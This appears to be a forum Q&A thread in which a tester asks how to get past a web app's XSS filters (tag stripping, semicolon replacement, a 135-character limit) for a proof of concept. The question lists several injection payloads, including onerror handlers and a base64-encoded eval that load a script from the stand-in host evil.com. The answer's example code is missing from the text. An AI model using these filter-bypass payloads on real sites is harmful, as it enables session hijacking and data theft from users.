I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.
The filters I have detected so far are as follows:
- `</anythingyouwant>` gets replaced with nothing
- `/>` gets replaced with nothing
- `;` gets replaced with a space until the next `>`
- 135 character limit including method of delivery, e.g.

    <img src="." onerror="alert('xss')">
Injecting `<img src="." onerror="alert('xss')">` works fine, however these developers are rather sceptical and wish to see a full PoC of full JavaScript code. Is it possible to run an arbitrary script at all?
I have tried:
<img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">result: too long, even with a shortened URL<script src="//evil.com/myscript" />result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag<script src=//evil.com/myscript"></script>result: gets filtered, destroys rest of page as above<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">result: semicolons get filtered, breaks web page<img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">result: im unsure if this is valid js, but it appears in the chromeview page sourceas intended, but does not work as wanted
I am using Chrome for testing, just in case it's relevant somehow.
The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

or your version with a `,` instead of a `;`:

But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet, which I found in this answer.